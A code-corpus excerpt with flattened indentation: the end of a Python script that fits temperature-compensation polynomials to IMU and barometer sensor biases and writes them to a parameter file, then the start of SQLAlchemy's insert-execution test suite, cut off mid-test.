coef_gyro_2_z = np.polyfit(temp_rel,sensor_gyro_2['z'],3)
gyro_2_params['TC_G2_X3_2'] = coef_gyro_2_z[0]
gyro_2_params['TC_G2_X2_2'] = coef_gyro_2_z[1]
gyro_2_params['TC_G2_X1_2'] = coef_gyro_2_z[2]
gyro_2_params['TC_G2_X0_2'] = coef_gyro_2_z[3]
fit_coef_gyro_2_z = np.poly1d(coef_gyro_2_z)
gyro_2_z_resample = fit_coef_gyro_2_z(temp_rel_resample)
# gyro2 vs temperature
plt.figure(3,figsize=(20,13))
# draw plots
plt.subplot(3,1,1)
plt.plot(sensor_gyro_2['temperature'],sensor_gyro_2['x'],'b')
plt.plot(temp_resample,gyro_2_x_resample,'r')
plt.title('Gyro 2 Bias vs Temperature')
plt.ylabel('X bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,2)
plt.plot(sensor_gyro_2['temperature'],sensor_gyro_2['y'],'b')
plt.plot(temp_resample,gyro_2_y_resample,'r')
plt.ylabel('Y bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,3)
plt.plot(sensor_gyro_2['temperature'],sensor_gyro_2['z'],'b')
plt.plot(temp_resample,gyro_2_z_resample,'r')
plt.ylabel('Z bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
pp.savefig()
#################################################################################
#################################################################################
# define data dictionary of accel 0 thermal correction parameters
accel_0_params = {
'TC_A0_ID':0,
'TC_A0_TMIN':0.0,
'TC_A0_TMAX':0.0,
'TC_A0_TREF':0.0,
'TC_A0_X0_0':0.0,
'TC_A0_X1_0':0.0,
'TC_A0_X2_0':0.0,
'TC_A0_X3_0':0.0,
'TC_A0_X0_1':0.0,
'TC_A0_X1_1':0.0,
'TC_A0_X2_1':0.0,
'TC_A0_X3_1':0.0,
'TC_A0_X0_2':0.0,
'TC_A0_X1_2':0.0,
'TC_A0_X2_2':0.0,
'TC_A0_X3_2':0.0,
'TC_A0_SCL_0':1.0,
'TC_A0_SCL_1':1.0,
'TC_A0_SCL_2':1.0
}
# curve fit the data for accel 0 corrections
if num_accels >= 1:
accel_0_params['TC_A0_ID'] = int(np.median(sensor_accel_0['device_id']))
# find the min, max and reference temperature
accel_0_params['TC_A0_TMIN'] = np.amin(sensor_accel_0['temperature'])
accel_0_params['TC_A0_TMAX'] = np.amax(sensor_accel_0['temperature'])
accel_0_params['TC_A0_TREF'] = 0.5 * (accel_0_params['TC_A0_TMIN'] + accel_0_params['TC_A0_TMAX'])
temp_rel = sensor_accel_0['temperature'] - accel_0_params['TC_A0_TREF']
temp_rel_resample = np.linspace(accel_0_params['TC_A0_TMIN']-accel_0_params['TC_A0_TREF'], accel_0_params['TC_A0_TMAX']-accel_0_params['TC_A0_TREF'], 100)
temp_resample = temp_rel_resample + accel_0_params['TC_A0_TREF']
# fit X axis
correction_x = sensor_accel_0['x'] - np.median(sensor_accel_0['x'])
coef_accel_0_x = np.polyfit(temp_rel,correction_x,3)
accel_0_params['TC_A0_X3_0'] = coef_accel_0_x[0]
accel_0_params['TC_A0_X2_0'] = coef_accel_0_x[1]
accel_0_params['TC_A0_X1_0'] = coef_accel_0_x[2]
accel_0_params['TC_A0_X0_0'] = coef_accel_0_x[3]
fit_coef_accel_0_x = np.poly1d(coef_accel_0_x)
correction_x_resample = fit_coef_accel_0_x(temp_rel_resample)
# fit Y axis
correction_y = sensor_accel_0['y']-np.median(sensor_accel_0['y'])
coef_accel_0_y = np.polyfit(temp_rel,correction_y,3)
accel_0_params['TC_A0_X3_1'] = coef_accel_0_y[0]
accel_0_params['TC_A0_X2_1'] = coef_accel_0_y[1]
accel_0_params['TC_A0_X1_1'] = coef_accel_0_y[2]
accel_0_params['TC_A0_X0_1'] = coef_accel_0_y[3]
fit_coef_accel_0_y = np.poly1d(coef_accel_0_y)
correction_y_resample = fit_coef_accel_0_y(temp_rel_resample)
# fit Z axis
correction_z = sensor_accel_0['z']-np.median(sensor_accel_0['z'])
coef_accel_0_z = np.polyfit(temp_rel,correction_z,3)
accel_0_params['TC_A0_X3_2'] = coef_accel_0_z[0]
accel_0_params['TC_A0_X2_2'] = coef_accel_0_z[1]
accel_0_params['TC_A0_X1_2'] = coef_accel_0_z[2]
accel_0_params['TC_A0_X0_2'] = coef_accel_0_z[3]
fit_coef_accel_0_z = np.poly1d(coef_accel_0_z)
correction_z_resample = fit_coef_accel_0_z(temp_rel_resample)
# accel 0 vs temperature
plt.figure(4,figsize=(20,13))
# draw plots
plt.subplot(3,1,1)
plt.plot(sensor_accel_0['temperature'],correction_x,'b')
plt.plot(temp_resample,correction_x_resample,'r')
plt.title('Accel 0 Bias vs Temperature')
plt.ylabel('X bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,2)
plt.plot(sensor_accel_0['temperature'],correction_y,'b')
plt.plot(temp_resample,correction_y_resample,'r')
plt.ylabel('Y bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,3)
plt.plot(sensor_accel_0['temperature'],correction_z,'b')
plt.plot(temp_resample,correction_z_resample,'r')
plt.ylabel('Z bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
pp.savefig()
#################################################################################
#################################################################################
# define data dictionary of accel 1 thermal correction parameters
accel_1_params = {
'TC_A1_ID':0,
'TC_A1_TMIN':0.0,
'TC_A1_TMAX':0.0,
'TC_A1_TREF':0.0,
'TC_A1_X0_0':0.0,
'TC_A1_X1_0':0.0,
'TC_A1_X2_0':0.0,
'TC_A1_X3_0':0.0,
'TC_A1_X0_1':0.0,
'TC_A1_X1_1':0.0,
'TC_A1_X2_1':0.0,
'TC_A1_X3_1':0.0,
'TC_A1_X0_2':0.0,
'TC_A1_X1_2':0.0,
'TC_A1_X2_2':0.0,
'TC_A1_X3_2':0.0,
'TC_A1_SCL_0':1.0,
'TC_A1_SCL_1':1.0,
'TC_A1_SCL_2':1.0
}
# curve fit the data for accel 1 corrections
if num_accels >= 2:
accel_1_params['TC_A1_ID'] = int(np.median(sensor_accel_1['device_id']))
# find the min, max and reference temperature
accel_1_params['TC_A1_TMIN'] = np.amin(sensor_accel_1['temperature'])
accel_1_params['TC_A1_TMAX'] = np.amax(sensor_accel_1['temperature'])
accel_1_params['TC_A1_TREF'] = 0.5 * (accel_1_params['TC_A1_TMIN'] + accel_1_params['TC_A1_TMAX'])
temp_rel = sensor_accel_1['temperature'] - accel_1_params['TC_A1_TREF']
temp_rel_resample = np.linspace(accel_1_params['TC_A1_TMIN']-accel_1_params['TC_A1_TREF'], accel_1_params['TC_A1_TMAX']-accel_1_params['TC_A1_TREF'], 100)
temp_resample = temp_rel_resample + accel_1_params['TC_A1_TREF']
# fit X axis
correction_x = sensor_accel_1['x']-np.median(sensor_accel_1['x'])
coef_accel_1_x = np.polyfit(temp_rel,correction_x,3)
accel_1_params['TC_A1_X3_0'] = coef_accel_1_x[0]
accel_1_params['TC_A1_X2_0'] = coef_accel_1_x[1]
accel_1_params['TC_A1_X1_0'] = coef_accel_1_x[2]
accel_1_params['TC_A1_X0_0'] = coef_accel_1_x[3]
fit_coef_accel_1_x = np.poly1d(coef_accel_1_x)
correction_x_resample = fit_coef_accel_1_x(temp_rel_resample)
# fit Y axis
correction_y = sensor_accel_1['y']-np.median(sensor_accel_1['y'])
coef_accel_1_y = np.polyfit(temp_rel,correction_y,3)
accel_1_params['TC_A1_X3_1'] = coef_accel_1_y[0]
accel_1_params['TC_A1_X2_1'] = coef_accel_1_y[1]
accel_1_params['TC_A1_X1_1'] = coef_accel_1_y[2]
accel_1_params['TC_A1_X0_1'] = coef_accel_1_y[3]
fit_coef_accel_1_y = np.poly1d(coef_accel_1_y)
correction_y_resample = fit_coef_accel_1_y(temp_rel_resample)
# fit Z axis
correction_z = (sensor_accel_1['z'])-np.median(sensor_accel_1['z'])
coef_accel_1_z = np.polyfit(temp_rel,correction_z,3)
accel_1_params['TC_A1_X3_2'] = coef_accel_1_z[0]
accel_1_params['TC_A1_X2_2'] = coef_accel_1_z[1]
accel_1_params['TC_A1_X1_2'] = coef_accel_1_z[2]
accel_1_params['TC_A1_X0_2'] = coef_accel_1_z[3]
fit_coef_accel_1_z = np.poly1d(coef_accel_1_z)
correction_z_resample = fit_coef_accel_1_z(temp_rel_resample)
# accel 1 vs temperature
plt.figure(5,figsize=(20,13))
# draw plots
plt.subplot(3,1,1)
plt.plot(sensor_accel_1['temperature'],correction_x,'b')
plt.plot(temp_resample,correction_x_resample,'r')
plt.title('Accel 1 Bias vs Temperature')
plt.ylabel('X bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,2)
plt.plot(sensor_accel_1['temperature'],correction_y,'b')
plt.plot(temp_resample,correction_y_resample,'r')
plt.ylabel('Y bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,3)
plt.plot(sensor_accel_1['temperature'],correction_z,'b')
plt.plot(temp_resample,correction_z_resample,'r')
plt.ylabel('Z bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
pp.savefig()
#################################################################################
#################################################################################
# define data dictionary of accel 2 thermal correction parameters
accel_2_params = {
'TC_A2_ID':0,
'TC_A2_TMIN':0.0,
'TC_A2_TMAX':0.0,
'TC_A2_TREF':0.0,
'TC_A2_X0_0':0.0,
'TC_A2_X1_0':0.0,
'TC_A2_X2_0':0.0,
'TC_A2_X3_0':0.0,
'TC_A2_X0_1':0.0,
'TC_A2_X1_1':0.0,
'TC_A2_X2_1':0.0,
'TC_A2_X3_1':0.0,
'TC_A2_X0_2':0.0,
'TC_A2_X1_2':0.0,
'TC_A2_X2_2':0.0,
'TC_A2_X3_2':0.0,
'TC_A2_SCL_0':1.0,
'TC_A2_SCL_1':1.0,
'TC_A2_SCL_2':1.0
}
# curve fit the data for accel 2 corrections
if num_accels >= 3:
accel_2_params['TC_A2_ID'] = int(np.median(sensor_accel_2['device_id']))
# find the min, max and reference temperature
accel_2_params['TC_A2_TMIN'] = np.amin(sensor_accel_2['temperature'])
accel_2_params['TC_A2_TMAX'] = np.amax(sensor_accel_2['temperature'])
accel_2_params['TC_A2_TREF'] = 0.5 * (accel_2_params['TC_A2_TMIN'] + accel_2_params['TC_A2_TMAX'])
temp_rel = sensor_accel_2['temperature'] - accel_2_params['TC_A2_TREF']
temp_rel_resample = np.linspace(accel_2_params['TC_A2_TMIN']-accel_2_params['TC_A2_TREF'], accel_2_params['TC_A2_TMAX']-accel_2_params['TC_A2_TREF'], 100)
temp_resample = temp_rel_resample + accel_2_params['TC_A2_TREF']
# fit X axis
correction_x = sensor_accel_2['x']-np.median(sensor_accel_2['x'])
coef_accel_2_x = np.polyfit(temp_rel,correction_x,3)
accel_2_params['TC_A2_X3_0'] = coef_accel_2_x[0]
accel_2_params['TC_A2_X2_0'] = coef_accel_2_x[1]
accel_2_params['TC_A2_X1_0'] = coef_accel_2_x[2]
accel_2_params['TC_A2_X0_0'] = coef_accel_2_x[3]
fit_coef_accel_2_x = np.poly1d(coef_accel_2_x)
correction_x_resample = fit_coef_accel_2_x(temp_rel_resample)
# fit Y axis
correction_y = sensor_accel_2['y']-np.median(sensor_accel_2['y'])
coef_accel_2_y = np.polyfit(temp_rel,correction_y,3)
accel_2_params['TC_A2_X3_1'] = coef_accel_2_y[0]
accel_2_params['TC_A2_X2_1'] = coef_accel_2_y[1]
accel_2_params['TC_A2_X1_1'] = coef_accel_2_y[2]
accel_2_params['TC_A2_X0_1'] = coef_accel_2_y[3]
fit_coef_accel_2_y = np.poly1d(coef_accel_2_y)
correction_y_resample = fit_coef_accel_2_y(temp_rel_resample)
# fit Z axis
correction_z = sensor_accel_2['z']-np.median(sensor_accel_2['z'])
coef_accel_2_z = np.polyfit(temp_rel,correction_z,3)
accel_2_params['TC_A2_X3_2'] = coef_accel_2_z[0]
accel_2_params['TC_A2_X2_2'] = coef_accel_2_z[1]
accel_2_params['TC_A2_X1_2'] = coef_accel_2_z[2]
accel_2_params['TC_A2_X0_2'] = coef_accel_2_z[3]
fit_coef_accel_2_z = np.poly1d(coef_accel_2_z)
correction_z_resample = fit_coef_accel_2_z(temp_rel_resample)
# accel 2 vs temperature
plt.figure(6,figsize=(20,13))
# draw plots
plt.subplot(3,1,1)
plt.plot(sensor_accel_2['temperature'],correction_x,'b')
plt.plot(temp_resample,correction_x_resample,'r')
plt.title('Accel 2 Bias vs Temperature')
plt.ylabel('X bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,2)
plt.plot(sensor_accel_2['temperature'],correction_y,'b')
plt.plot(temp_resample,correction_y_resample,'r')
plt.ylabel('Y bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,3)
plt.plot(sensor_accel_2['temperature'],correction_z,'b')
plt.plot(temp_resample,correction_z_resample,'r')
plt.ylabel('Z bias (m/s/s)')
plt.xlabel('temperature (degC)')
plt.grid()
pp.savefig()
#################################################################################
#################################################################################
# define data dictionary of baro 0 thermal correction parameters
baro_0_params = {
'TC_B0_ID':0,
'TC_B0_TMIN':0.0,
'TC_B0_TMAX':0.0,
'TC_B0_TREF':0.0,
'TC_B0_X0':0.0,
'TC_B0_X1':0.0,
'TC_B0_X2':0.0,
'TC_B0_X3':0.0,
'TC_B0_X4':0.0,
'TC_B0_X5':0.0,
'TC_B0_SCL':1.0,
}
# curve fit the data for baro 0 corrections
baro_0_params['TC_B0_ID'] = int(np.median(sensor_baro_0['device_id']))
# find the min, max and reference temperature
baro_0_params['TC_B0_TMIN'] = np.amin(sensor_baro_0['temperature'])
baro_0_params['TC_B0_TMAX'] = np.amax(sensor_baro_0['temperature'])
baro_0_params['TC_B0_TREF'] = 0.5 * (baro_0_params['TC_B0_TMIN'] + baro_0_params['TC_B0_TMAX'])
temp_rel = sensor_baro_0['temperature'] - baro_0_params['TC_B0_TREF']
temp_rel_resample = np.linspace(baro_0_params['TC_B0_TMIN']-baro_0_params['TC_B0_TREF'], baro_0_params['TC_B0_TMAX']-baro_0_params['TC_B0_TREF'], 100)
temp_resample = temp_rel_resample + baro_0_params['TC_B0_TREF']
# fit data
median_pressure = np.median(sensor_baro_0['pressure']);
coef_baro_0_x = np.polyfit(temp_rel,100*(sensor_baro_0['pressure']-median_pressure),5) # convert from hPa to Pa
baro_0_params['TC_B0_X5'] = coef_baro_0_x[0]
baro_0_params['TC_B0_X4'] = coef_baro_0_x[1]
baro_0_params['TC_B0_X3'] = coef_baro_0_x[2]
baro_0_params['TC_B0_X2'] = coef_baro_0_x[3]
baro_0_params['TC_B0_X1'] = coef_baro_0_x[4]
baro_0_params['TC_B0_X0'] = coef_baro_0_x[5]
fit_coef_baro_0_x = np.poly1d(coef_baro_0_x)
baro_0_x_resample = fit_coef_baro_0_x(temp_rel_resample)
# baro 0 vs temperature
plt.figure(7,figsize=(20,13))
# draw plots
plt.plot(sensor_baro_0['temperature'],100*sensor_baro_0['pressure']-100*median_pressure,'b')
plt.plot(temp_resample,baro_0_x_resample,'r')
plt.title('Baro 0 Bias vs Temperature')
plt.ylabel('Z bias (Pa)')
plt.xlabel('temperature (degC)')
plt.grid()
pp.savefig()
# define data dictionary of baro 1 thermal correction parameters
baro_1_params = {
'TC_B1_ID':0,
'TC_B1_TMIN':0.0,
'TC_B1_TMAX':0.0,
'TC_B1_TREF':0.0,
'TC_B1_X0':0.0,
'TC_B1_X1':0.0,
'TC_B1_X2':0.0,
'TC_B1_X3':0.0,
'TC_B1_X4':0.0,
'TC_B1_X5':0.0,
'TC_B1_SCL':1.0,
}
if num_baros >= 2:
# curve fit the data for baro 0 corrections
baro_1_params['TC_B1_ID'] = int(np.median(sensor_baro_1['device_id']))
# find the min, max and reference temperature
baro_1_params['TC_B1_TMIN'] = np.amin(sensor_baro_1['temperature'])
baro_1_params['TC_B1_TMAX'] = np.amax(sensor_baro_1['temperature'])
baro_1_params['TC_B1_TREF'] = 0.5 * (baro_1_params['TC_B1_TMIN'] + baro_1_params['TC_B1_TMAX'])
temp_rel = sensor_baro_1['temperature'] - baro_1_params['TC_B1_TREF']
temp_rel_resample = np.linspace(baro_1_params['TC_B1_TMIN']-baro_1_params['TC_B1_TREF'], baro_1_params['TC_B1_TMAX']-baro_1_params['TC_B1_TREF'], 100)
temp_resample = temp_rel_resample + baro_1_params['TC_B1_TREF']
# fit data
median_pressure = np.median(sensor_baro_1['pressure']);
coef_baro_1_x = np.polyfit(temp_rel,100*(sensor_baro_1['pressure']-median_pressure),5) # convert from hPa to Pa
baro_1_params['TC_B1_X5'] = coef_baro_1_x[0]
baro_1_params['TC_B1_X4'] = coef_baro_1_x[1]
baro_1_params['TC_B1_X3'] = coef_baro_1_x[2]
baro_1_params['TC_B1_X2'] = coef_baro_1_x[3]
baro_1_params['TC_B1_X1'] = coef_baro_1_x[4]
baro_1_params['TC_B1_X0'] = coef_baro_1_x[5]
fit_coef_baro_1_x = np.poly1d(coef_baro_1_x)
baro_1_x_resample = fit_coef_baro_1_x(temp_rel_resample)
# baro 1 vs temperature
plt.figure(8,figsize=(20,13))
# draw plots
plt.plot(sensor_baro_1['temperature'],100*sensor_baro_1['pressure']-100*median_pressure,'b')
plt.plot(temp_resample,baro_1_x_resample,'r')
plt.title('Baro 1 Bias vs Temperature')
plt.ylabel('Z bias (Pa)')
plt.xlabel('temperature (degC)')
plt.grid()
pp.savefig()
#################################################################################
# close the pdf file
pp.close()
# clase all figures
plt.close("all")
# write correction parameters to file
test_results_filename = ulog_file_name + ".params"
file = open(test_results_filename,"w")
file.write("# Sensor thermal compensation parameters\n")
file.write("#\n")
file.write("# Vehicle-Id Component-Id Name Value Type\n")
# accel 0 corrections
key_list_accel = list(accel_0_params.keys())
key_list_accel.sort
for key in key_list_accel:
if key == 'TC_A0_ID':
type = "6"
else:
type = "9"
file.write("1"+"\t"+"1"+"\t"+key+"\t"+str(accel_0_params[key])+"\t"+type+"\n")
# accel 1 corrections
key_list_accel = list(accel_1_params.keys())
key_list_accel.sort
for key in key_list_accel:
if key == 'TC_A1_ID':
type = "6"
else:
type = "9"
file.write("1"+"\t"+"1"+"\t"+key+"\t"+str(accel_1_params[key])+"\t"+type+"\n")
# accel 2 corrections
key_list_accel = list(accel_2_params.keys())
key_list_accel.sort
for key in key_list_accel:
if key == 'TC_A2_ID':
type = "6"
else:
type = "9"
file.write("1"+"\t"+"1"+"\t"+key+"\t"+str(accel_2_params[key])+"\t"+type+"\n")
# baro 0 corrections
key_list_baro = list(baro_0_params.keys())
key_list_baro.sort
for key in key_list_baro:
if key == 'TC_B0_ID':
type = "6"
else:
type = "9"
file.write("1"+"\t"+"1"+"\t"+key+"\t"+str(baro_0_params[key])+"\t"+type+"\n")
# baro 1 corrections
key_list_baro = list(baro_1_params.keys())
key_list_baro.sort
for key in key_list_baro:
if key == 'TC_B1_ID':
type = "6"
else:
type = "9"
file.write("1"+"\t"+"1"+"\t"+key+"\t"+str(baro_1_params[key])+"\t"+type+"\n")
# gyro 0 corrections
key_list_gyro = list(gyro_0_params.keys())
key_list_gyro.sort()
for key in key_list_gyro:
if key == 'TC_G0_ID':
type = "6"
else:
type = "9"
file.write("1"+"\t"+"1"+"\t"+key+"\t"+str(gyro_0_params[key])+"\t"+type+"\n")
# gyro 1 corrections
key_list_gyro = list(gyro_1_params.keys())
key_list_gyro.sort()
for key in key_list_gyro:
if key == 'TC_G1_ID':
type = "6"
else:
type = "9"
file.write("1"+"\t"+"1"+"\t"+key+"\t"+str(gyro_1_params[key])+"\t"+type+"\n")
# gyro 2 corrections
key_list_gyro = list(gyro_2_params.keys())
key_list_gyro.sort()
for key in key_list_gyro:
if key == 'TC_G2_ID':
type = "6"
else:
type = "9"
file.write("1"+"\t"+"1"+"\t"+key+"\t"+str(gyro_2_params[key])+"\t"+type+"\n")
file.close()
print('Correction parameters written to ' + test_results_filename)
print('Plots saved to ' + output_plot_filename)
| bsd-3-clause |
hsum/sqlalchemy | test/sql/test_insert_exec.py | 9 | 14651 | from sqlalchemy.testing import eq_, assert_raises_message, is_
from sqlalchemy import testing
from sqlalchemy.testing import fixtures, engines
from sqlalchemy import (
exc, sql, String, Integer, MetaData, and_, ForeignKey,
VARCHAR, INT, Sequence, func)
from sqlalchemy.testing.schema import Table, Column
class InsertExecTest(fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
'users', metadata,
Column(
'user_id', INT, primary_key=True,
test_needs_autoincrement=True),
Column('user_name', VARCHAR(20)),
test_needs_acid=True
)
@testing.requires.multivalues_inserts
def test_multivalues_insert(self):
users = self.tables.users
users.insert(
values=[
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'}]).execute()
rows = users.select().order_by(users.c.user_id).execute().fetchall()
eq_(rows[0], (7, 'jack'))
eq_(rows[1], (8, 'ed'))
users.insert(values=[(9, 'jack'), (10, 'ed')]).execute()
rows = users.select().order_by(users.c.user_id).execute().fetchall()
eq_(rows[2], (9, 'jack'))
eq_(rows[3], (10, 'ed'))
def test_insert_heterogeneous_params(self):
"""test that executemany parameters are asserted to match the
parameter set of the first."""
users = self.tables.users
assert_raises_message(
exc.StatementError,
r"\(sqlalchemy.exc.InvalidRequestError\) A value is required for "
"bind parameter 'user_name', in "
"parameter group 2 "
r"\[SQL: u?'INSERT INTO users",
users.insert().execute,
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9}
)
# this succeeds however. We aren't yet doing
# a length check on all subsequent parameters.
users.insert().execute(
{'user_id': 7},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9}
)
def _test_lastrow_accessor(self, table_, values, assertvalues):
"""Tests the inserted_primary_key and lastrow_has_id() functions."""
def insert_values(engine, table_, values):
"""
Inserts a row into a table, returns the full list of values
INSERTed including defaults that fired off on the DB side and
detects rows that had defaults and post-fetches.
"""
# verify implicit_returning is working
if engine.dialect.implicit_returning:
ins = table_.insert()
comp = ins.compile(engine, column_keys=list(values))
if not set(values).issuperset(
c.key for c in table_.primary_key):
is_(bool(comp.returning), True)
result = engine.execute(table_.insert(), **values)
ret = values.copy()
for col, id in zip(
table_.primary_key, result.inserted_primary_key):
ret[col.key] = id
if result.lastrow_has_defaults():
criterion = and_(
*[
col == id for col, id in
zip(table_.primary_key, result.inserted_primary_key)])
row = engine.execute(table_.select(criterion)).first()
for c in table_.c:
ret[c.key] = row[c]
return ret
if testing.against('firebird', 'postgresql', 'oracle', 'mssql'):
assert testing.db.dialect.implicit_returning
if testing.db.dialect.implicit_returning:
test_engines = [
engines.testing_engine(options={'implicit_returning': False}),
engines.testing_engine(options={'implicit_returning': True}),
]
else:
test_engines = [testing.db]
for engine in test_engines:
try:
table_.create(bind=engine, checkfirst=True)
i = insert_values(engine, table_, values)
eq_(i, assertvalues)
finally:
table_.drop(bind=engine)
@testing.skip_if('sqlite')
def test_lastrow_accessor_one(self):
metadata = MetaData()
self._test_lastrow_accessor(
Table(
"t1", metadata,
Column(
'id', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('foo', String(30), primary_key=True)),
{'foo': 'hi'},
{'id': 1, 'foo': 'hi'}
)
@testing.skip_if('sqlite')
def test_lastrow_accessor_two(self):
metadata = MetaData()
self._test_lastrow_accessor(
Table(
"t2", metadata,
Column(
'id', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('foo', String(30), primary_key=True),
Column('bar', String(30), server_default='hi')
),
{'foo': 'hi'},
{'id': 1, 'foo': 'hi', 'bar': 'hi'}
)
def test_lastrow_accessor_three(self):
metadata = MetaData()
self._test_lastrow_accessor(
Table(
"t3", metadata,
Column("id", String(40), primary_key=True),
Column('foo', String(30), primary_key=True),
Column("bar", String(30))
),
{'id': 'hi', 'foo': 'thisisfoo', 'bar': "thisisbar"},
{'id': 'hi', 'foo': 'thisisfoo', 'bar': "thisisbar"}
)
def test_lastrow_accessor_four(self):
metadata = MetaData()
self._test_lastrow_accessor(
Table(
"t4", metadata,
Column(
'id', Integer,
Sequence('t4_id_seq', optional=True),
primary_key=True),
Column('foo', String(30), primary_key=True),
Column('bar', String(30), server_default='hi')
),
{'foo': 'hi', 'id': 1},
{'id': 1, 'foo': 'hi', 'bar': 'hi'}
)
def test_lastrow_accessor_five(self):
metadata = MetaData()
self._test_lastrow_accessor(
Table(
"t5", metadata,
Column('id', String(10), primary_key=True),
Column('bar', String(30), server_default='hi')
),
{'id': 'id1'},
{'id': 'id1', 'bar': 'hi'},
)
@testing.skip_if('sqlite')
def test_lastrow_accessor_six(self):
metadata = MetaData()
self._test_lastrow_accessor(
Table(
"t6", metadata,
Column(
'id', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('bar', Integer, primary_key=True)
),
{'bar': 0},
{'id': 1, 'bar': 0},
)
# TODO: why not in the sqlite suite?
@testing.only_on('sqlite+pysqlite')
@testing.provide_metadata
def test_lastrowid_zero(self):
from sqlalchemy.dialects import sqlite
eng = engines.testing_engine()
class ExcCtx(sqlite.base.SQLiteExecutionContext):
def get_lastrowid(self):
return 0
eng.dialect.execution_ctx_cls = ExcCtx
t = Table(
't', self.metadata, Column('x', Integer, primary_key=True),
Column('y', Integer))
t.create(eng)
r = eng.execute(t.insert().values(y=5))
eq_(r.inserted_primary_key, [0])
@testing.fails_on(
'sqlite', "sqlite autoincremnt doesn't work with composite pks")
@testing.provide_metadata
def test_misordered_lastrow(self):
metadata = self.metadata
related = Table(
'related', metadata,
Column('id', Integer, primary_key=True),
mysql_engine='MyISAM'
)
t6 = Table(
"t6", metadata,
Column(
'manual_id', Integer, ForeignKey('related.id'),
primary_key=True),
Column(
'auto_id', Integer, primary_key=True,
test_needs_autoincrement=True),
mysql_engine='MyISAM'
)
metadata.create_all()
r = related.insert().values(id=12).execute()
id_ = r.inserted_primary_key[0]
eq_(id_, 12)
r = t6.insert().values(manual_id=id_).execute()
eq_(r.inserted_primary_key, [12, 1])
def test_implicit_id_insert_select_columns(self):
users = self.tables.users
stmt = users.insert().from_select(
(users.c.user_id, users.c.user_name),
users.select().where(users.c.user_id == 20))
testing.db.execute(stmt)
def test_implicit_id_insert_select_keys(self):
users = self.tables.users
stmt = users.insert().from_select(
["user_id", "user_name"],
users.select().where(users.c.user_id == 20))
testing.db.execute(stmt)
@testing.requires.empty_inserts
@testing.requires.returning
def test_no_inserted_pk_on_returning(self):
users = self.tables.users
result = testing.db.execute(users.insert().returning(
users.c.user_id, users.c.user_name))
assert_raises_message(
exc.InvalidRequestError,
r"Can't call inserted_primary_key when returning\(\) is used.",
getattr, result, 'inserted_primary_key'
)
class TableInsertTest(fixtures.TablesTest):
"""test for consistent insert behavior across dialects
regarding the inline=True flag, lower-case 't' tables.
"""
run_create_tables = 'each'
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
'foo', metadata,
Column('id', Integer, Sequence('t_id_seq'), primary_key=True),
Column('data', String(50)),
Column('x', Integer)
)
def _fixture(self, types=True):
if types:
t = sql.table(
'foo', sql.column('id', Integer),
sql.column('data', String),
sql.column('x', Integer))
else:
t = sql.table(
'foo', sql.column('id'), sql.column('data'), sql.column('x'))
return t
def _test(self, stmt, row, returning=None, inserted_primary_key=False):
r = testing.db.execute(stmt)
if returning:
returned = r.first()
eq_(returned, returning)
elif inserted_primary_key is not False:
eq_(r.inserted_primary_key, inserted_primary_key)
eq_(testing.db.execute(self.tables.foo.select()).first(), row)
def _test_multi(self, stmt, rows, data):
testing.db.execute(stmt, rows)
eq_(
testing.db.execute(
self.tables.foo.select().
order_by(self.tables.foo.c.id)).fetchall(),
data)
@testing.requires.sequences
def test_expicit_sequence(self):
t = self._fixture()
self._test(
t.insert().values(
id=func.next_value(Sequence('t_id_seq')), data='data', x=5),
(1, 'data', 5)
)
def test_uppercase(self):
t = self.tables.foo
self._test(
t.insert().values(id=1, data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[1]
)
def test_uppercase_inline(self):
t = self.tables.foo
self._test(
t.insert(inline=True).values(id=1, data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[1]
)
@testing.crashes(
"mssql+pyodbc",
"Pyodbc + SQL Server + Py3K, some decimal handling issue")
def test_uppercase_inline_implicit(self):
t = self.tables.foo
self._test(
t.insert(inline=True).values(data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[None]
)
def test_uppercase_implicit(self):
t = self.tables.foo
self._test(
t.insert().values(data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[1]
)
def test_uppercase_direct_params(self):
t = self.tables.foo
self._test(
t.insert().values(id=1, data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[1]
)
@testing.requires.returning
def test_uppercase_direct_params_returning(self):
t = self.tables.foo
self._test(
t.insert().values(id=1, data='data', x=5).returning(t.c.id, t.c.x),
(1, 'data', 5),
returning=(1, 5)
)
@testing.fails_on(
'mssql', "lowercase table doesn't support identity insert disable")
def test_direct_params(self):
t = self._fixture()
self._test(
t.insert().values(id=1, data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[]
)
@testing.fails_on(
'mssql', "lowercase table doesn't support identity insert disable")
@testing.requires.returning
def test_direct_params_returning(self):
t = self._fixture()
self._test(
t.insert().values(id=1, data='data', x=5).returning(t.c.id, t.c.x),
(1, 'data', 5),
returning=(1, 5)
)
@testing.requires.emulated_lastrowid
def test_implicit_pk(self):
t = self._fixture()
self._test(
t.insert().values(data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[]
)
@testing.requires.emulated_lastrowid
def test_implicit_pk_multi_rows(self):
t = self._fixture()
self._test_multi(
t.insert(),
[
